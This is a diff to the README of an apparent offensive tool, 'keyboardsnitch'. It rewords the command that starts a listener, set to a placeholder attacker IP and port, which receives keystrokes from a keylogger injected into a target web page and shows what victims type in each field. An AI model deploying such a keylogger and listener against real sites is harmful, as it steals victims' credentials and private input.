s0lst1c3/keyboardsnitch/README.md

 Once the keylogger has been injected into the target web page, we start __keyboardsnitch__'s server component to start logging keystrokes.

-	python keyboardsnitch.py --lhost <your ip address or fqdn here> --lport <the port on which to listen for data from the keylogger>
+	# substitute YOUR_IP with your ip address
+	# substitute LISTEN_PORT with the port you want keyboardsnitch to listen on
+	python keyboardsnitch.py --lhost YOUR_IP --lport LISTEN_PORT

 When a user begins typing into a text field on the target web page, the contents of that text field will be shown in real time.
 Additionally, information about the text field is displayed so that you can identify what is being typed where.